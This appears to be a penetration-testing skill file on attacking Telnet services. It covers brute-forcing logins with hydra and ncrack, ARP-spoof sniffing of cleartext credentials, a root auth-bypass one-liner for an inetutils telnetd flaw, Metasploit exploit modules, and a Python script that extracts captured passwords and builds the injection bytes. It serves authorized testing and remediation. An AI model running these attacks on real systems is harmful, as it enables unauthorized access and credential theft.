---
name: pentesting-telnet
description: Testing Telnet services (default port 23) for cleartext credential capture, default/weak and hard-coded credentials, NTLM info disclosure, option negotiation issues, and code-execution/DoS CVEs (inetutils telnetd NEW_ENVIRON option injection CVE-2026-24061, D-Link CVE-2024-45698, NETGEAR CVE-2023-40478, inetutils DoS CVE-2022-39028) during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- telnet
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting Telnet (port 23)

## When to Use
- Default port `23/tcp` (some appliances expose alternates). Telnet is an **unencrypted** remote-access protocol.
- When `nmap`/banner shows `telnet`, a `telnetd` daemon, or a login prompt over port 23.
- Very common on IoT, routers, switches, VoIP, and legacy UNIX — a prime target for default-credential and cleartext-sniffing attacks.

## Quick Enumeration
```bash
# Banner grab
nc -vn <IP> 23

# Safe scripted enumeration
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

# Option / feature probes
nmap -p 23 --script telnet-encryption <IP>    # ENCRYPT option support
nmap -p 23 --script telnet-ntlm-info <IP>      # Microsoft Telnet NTLM (NetBIOS/DNS/OS build)

# Consoleless metasploit enumeration
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS <IP>; set RPORT 23; run; exit'
```

## Critical: Checks Most Often Missed
- **Cleartext credentials on the wire** — everything (including the password) is plaintext. From a hub, SPAN/mirror port or the same broadcast domain just sniff; on a switched LAN, ARP-spoof (MitM) first, then sniff.
  - How to CONFIRM:
    ```bash
    sudo tcpdump -i eth0 -A 'tcp port 23'
    # Wireshark display filter:  tcp.port == 23 && telnet   then Follow > TCP Stream
    # (clients send one keystroke per segment and the password is never echoed,
    #  so read the client->server direction of the stream, not the raw -A dump)
    ```
- **Default / hard-coded credentials** — IoT botnets (Mirai) thrive here. Try vendor defaults and small dictionaries.
  - How to CONFIRM: `hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>` returns a valid pair.
- **NTLM info disclosure** — Microsoft Telnet leaks NetBIOS/DNS/OS build via `AUTH NTLM`.
  - How to CONFIRM: `nmap -p23 --script telnet-ntlm-info <IP>`.
- **inetutils telnetd NEW_ENVIRON option injection (CVE-2026-24061)** — the client-supplied `USER` environment variable is expanded (`%U`) into the `login` argv unsanitised; a value starting with `-` is parsed as a flag, so `-f root` becomes `login -f root` (skip authentication) → root shell (inetutils 1.9.3–2.7).
  - How to CONFIRM (lab only):
    ```bash
    USER='-f root' telnet -a <IP>     # -a sends the local USER via NEW-ENVIRON; a vulnerable host runs /usr/bin/login -h <host> "-f root" -> root shell
    # version triage on the target
    telnetd --version ; dpkg -l | grep inetutils ; ss -tlnp | grep ':23 '
    ```
- **Device CVEs to triage**: D-Link DIR-X4860 hard-coded creds + command injection (CVE-2024-45698), NETGEAR RAX30 `passwd` stack overflow (CVE-2023-40478), inetutils telnetd NULL-deref DoS via `0xff 0xf7`/`0xff 0xf8` (CVE-2022-39028).

## Workflow

### Step 1: Enumerate (version, options, NTLM)
```bash
nc -vn <IP> 23
nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>    # "*telnet*" alone also pulls in telnet-brute
nmap -p23 --script telnet-encryption,telnet-ntlm-info <IP>
```

### Step 2: Authenticate (default creds, brute force)
```bash
# Hydra (-f: stop at first valid login; -t 4 because telnetd often drops or rate-limits parallel sessions)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (prints found pairs; --connection-limit keeps the daemon from dropping sessions)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (-H host file for many targets, -h for a single host; -f stops per host on first hit)
medusa -M telnet -H targets.txt -U users.txt -P passwords.txt -t 6 -f
# NSE brute auditor
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>
```

### Step 3: Exploit / Extract (sniff, inject, CVE)
```bash
# Capture creds via MitM + sniff on a switched network
#   1. ARP spoof:  arpspoof -i eth0 -t <victim> <gateway>   (or ettercap)
#   2. Sniff:      sudo tcpdump -i eth0 -A 'tcp port 23'

# inetutils option-injection auth bypass (lab/authorized)
USER='-f root' telnet -a <IP>

# Metasploit modules
msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS <IP>; run; exit'  # detects the ENCRYPT key-id overflow (CVE-2011-4862) in BSD-derived telnetd; exploit/linux/telnet/telnet_encrypt_keyid exploits it
msfconsole -q -x 'use exploit/linux/telnet/netgear_telnetenable; set RHOSTS <IP>; run; exit'         # sends the NETGEAR "telnetenable" packet to unlock the daemon (check `show options` for required MAC/creds)
```

### Step 4: Post-access / pivot
- TTYs are usually dumb — upgrade: `python3 -c 'import pty;pty.spawn("/bin/bash")'`.
- Harvest device configs/credentials and reuse against SSH/web/SNMP management interfaces.
- Watch for outbound port-23 connections from compromised devices: egress filters that only inspect HTTP often leave port 23 open, so reverse shells and bot beacons commonly ride on it.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **Cleartext transport** | All data and credentials traverse the network unencrypted — passively sniffable. |
| **IAC option negotiation** | `IAC + DO/DONT/WILL/WONT` agree on options (echo, charset, ENCRYPT, NEW_ENVIRON). |
| **NEW_ENVIRON injection** | Client-pushed env vars (e.g., `USER`) reaching the `login` argv enable option injection (CVE-2026-24061). |
| **NTLM disclosure** | Microsoft Telnet `AUTH NTLM` leaks host/domain/OS metadata. |
| **Default-cred exposure** | IoT/embedded devices ship weak/hard-coded logins; mass-scanned by botnets. |
| **ENCRYPT option bugs** | Historic mishandling of the ENCRYPT key-id in BSD-derived telnetd (CVE-2011-4862) gave remote code execution; the NSE script only reports whether ENCRYPT is offered, the Metasploit scanner tests for the overflow. |
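
The two checks above that are easiest to get wrong by hand are reading credentials out of a raw capture (one keystroke per segment, IAC bytes interleaved, password never echoed) and seeing what `telnet -a` actually puts on the wire for NEW-ENVIRON. The script below is an added example, not code from the skill page or from inetutils: a minimal RFC 854 IAC tokenizer shared by a credential extractor (the cleartext check and Scenario 2) and a negotiation responder that answers the server's `DO NEW-ENVIRON` / `SEND` with an `IS` carrying `USER` (the `IAC option negotiation` and `NEW_ENVIRON injection` rows, and the CVE-2026-24061 lab check). All byte strings are constructed for the demo, the responder declines every other option (a real client also negotiates TTYPE, NAWS etc.), and nothing connects to a network.

```python
"""Minimal Telnet (RFC 854) IAC tokenizer with two uses: extracting a login/password
pair from a captured cleartext session, and building the client side of NEW-ENVIRON
(RFC 1572) negotiation. Added example; all sample bytes below are constructed."""
import re

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
NEW_ENVIRON = 39                                  # option code, RFC 1572
ENV_IS, ENV_SEND = 0, 1                           # NEW-ENVIRON subnegotiation commands
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3


def tokenize(stream: bytes):
    """Yield ('data', bytes) for application bytes and ('cmd', bytes) for each IAC
    sequence: IAC DO/DONT/WILL/WONT <opt>, IAC SB ... IAC SE, or a bare IAC <cmd>.
    (A doubled 0xff inside a subnegotiation followed by 0xf0 would need a stricter scan.)"""
    i, n, buf = 0, len(stream), bytearray()
    while i < n:
        if stream[i] != IAC:
            buf.append(stream[i])
            i += 1
            continue
        if i + 1 < n and stream[i + 1] == IAC:    # doubled 0xff is a literal data byte
            buf.append(IAC)
            i += 2
            continue
        if buf:
            yield 'data', bytes(buf)
            buf = bytearray()
        if i + 1 >= n:                            # dangling IAC at end of capture
            break
        cmd = stream[i + 1]
        if cmd == SB:
            end = stream.find(bytes([IAC, SE]), i + 2)
            if end < 0:                           # truncated subnegotiation
                break
            yield 'cmd', stream[i:end + 2]
            i = end + 2
        elif cmd in (DO, DONT, WILL, WONT):
            yield 'cmd', stream[i:i + 3]
            i += 3
        else:
            yield 'cmd', stream[i:i + 2]
            i += 2
    if buf:
        yield 'data', bytes(buf)


def plain_text(stream: bytes) -> str:
    """Application bytes only, negotiation stripped (what the user actually saw/typed)."""
    return b''.join(d for kind, d in tokenize(stream) if kind == 'data').decode('latin-1')


PROMPT = re.compile(r'(login|username|password)\s*:', re.I)


def extract_credentials(server_to_client: bytes, client_to_server: bytes) -> dict:
    """Pair the server's prompts with the lines the client typed. The client->server
    direction is authoritative: the password is typed there but never echoed back."""
    prompts = [m.group(1).lower() for m in PROMPT.finditer(plain_text(server_to_client))]
    typed = plain_text(client_to_server).replace('\r\x00', '\r\n').split('\r\n')
    creds = {}
    for prompt, line in zip(prompts, typed):
        key = 'password' if prompt == 'password' else 'login'
        creds.setdefault(key, line)               # first answer to each prompt kind wins
    return creds


def _env_escape(raw: bytes) -> bytes:
    """RFC 1572: VAR/VALUE/ESC/USERVAR bytes inside names or values are ESC-prefixed; 0xff is doubled."""
    out = bytearray()
    for b in raw:
        if b in (ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR):
            out += bytes([ENV_ESC, b])
        elif b == IAC:
            out += bytes([IAC, IAC])
        else:
            out.append(b)
    return bytes(out)


def new_environ_is(env: dict) -> bytes:
    """IAC SB NEW-ENVIRON IS (VAR name VALUE value)* IAC SE, as a client answers a SEND."""
    body = bytearray([IAC, SB, NEW_ENVIRON, ENV_IS])
    for name, value in env.items():
        body += bytes([ENV_VAR]) + _env_escape(name.encode()) + bytes([ENV_VALUE]) + _env_escape(value.encode())
    return bytes(body) + bytes([IAC, SE])


def client_replies(server_bytes: bytes, user: str = 'admin') -> bytes:
    """Answer each server command as a minimal automatic-login client: WILL NEW-ENVIRON,
    WONT any other option requested, DONT any option offered, and push USER on SEND."""
    out = bytearray()
    for kind, tok in tokenize(server_bytes):
        if kind != 'cmd' or len(tok) < 3:
            continue
        cmd, opt = tok[1], tok[2]
        if cmd == DO:
            out += bytes([IAC, WILL if opt == NEW_ENVIRON else WONT, opt])
        elif cmd == WILL:
            out += bytes([IAC, DONT, opt])
        elif cmd == SB and opt == NEW_ENVIRON and tok[3:4] == bytes([ENV_SEND]):
            out += new_environ_is({'USER': user})
    return bytes(out)


# Constructed sample session (not a real capture): DO TTYPE, DO NEW-ENVIRON, WILL ECHO, then prompts.
SERVER_TO_CLIENT = b'\xff\xfd\x18\xff\xfd\x27\xff\xfb\x01' b'lab-box login: admin\r\nPassword: \r\nWelcome\r\n$ '
CLIENT_TO_SERVER = b'\xff\xfc\x18\xff\xfc\x27\xff\xfd\x01' b'admin\r\nS3cret!\r\n'
# Constructed server negotiation: DO NEW-ENVIRON, WILL ECHO, DO TTYPE, then NEW-ENVIRON SEND.
SERVER_NEGOTIATION = b'\xff\xfd\x27' b'\xff\xfb\x01' b'\xff\xfd\x18' b'\xff\xfa\x27\x01\xff\xf0'

if __name__ == '__main__':
    print('captured:', extract_credentials(SERVER_TO_CLIENT, CLIENT_TO_SERVER))
    # The value the page's lab check sends; only ever point this at a host you are authorised to test.
    print('on the wire for USER=-f root:', client_replies(SERVER_NEGOTIATION, user='-f root').hex(' '))
```

Feed `extract_credentials()` the two directions of a `tcpdump -w` capture (split by source with any pcap library) and it returns the pair a `Follow TCP Stream` view would show; `client_replies()` is the exact byte sequence to compare against what a vulnerable telnetd hands to `login`.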

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap NSE** | `telnet-encryption`, `telnet-ntlm-info`, `telnet-brute`, `*telnet*` safe scripts. |
| **nc / telnet** | Banner grab, manual option negotiation, exploitation of option injection. |
| **hydra / ncrack / medusa** | Credential brute force against the login. |
| **tcpdump / Wireshark / ettercap** | Cleartext credential capture and MitM. |
| **Metasploit** | `telnet_version`, `telnet_encrypt_overflow`, `brocade_enable_login`, `netgear_telnetenable`. |
| **arpspoof / ettercap** | ARP spoofing to position for sniffing on switched networks. |

## Common Scenarios
### Scenario 1: Default creds on an IoT device
A camera exposes telnet on 23. `hydra -L users.txt -P mirai-defaults.txt telnet://<IP>` finds `root:vizxv`, granting a busybox shell and device takeover.

### Scenario 2: Cleartext credential capture
On a switched LAN, ARP spoofing redirects an admin's telnet session through the tester's host. `tcpdump -A 'tcp port 23'` reveals the typed username and password in plaintext, reused on adjacent SSH services.

### Scenario 3: inetutils telnetd auth bypass
A Linux host runs vulnerable inetutils telnetd. `USER='-f root' telnet -a <IP>` injects `-f root` into the login argv, spawning a pre-authenticated root shell (CVE-2026-24061).

## Output Format
```
## Telnet Finding

**Service**: Telnet
**Port**: 23/tcp (Linux inetutils telnetd 2.4)
**Severity**: Critical
**Finding**: Cleartext protocol + authentication bypass via NEW_ENVIRON option injection
**Evidence**:
  - tcpdump 'tcp port 23' captured "admin / S3cret!" in plaintext
  - USER='-f root' telnet -a <IP> -> uid=0(root) shell (CVE-2026-24061)
**Impact**: Credentials are exposed to any network observer, and an unauthenticated attacker can obtain a root shell.
**Recommendation**:
  1. Disable Telnet entirely and use SSH instead.
  2. If unavoidable, restrict to a management VLAN with ACLs/TCP wrappers and patch telnetd (inetutils >= 2.7-2).
  3. Rotate all credentials exposed over cleartext Telnet.
```
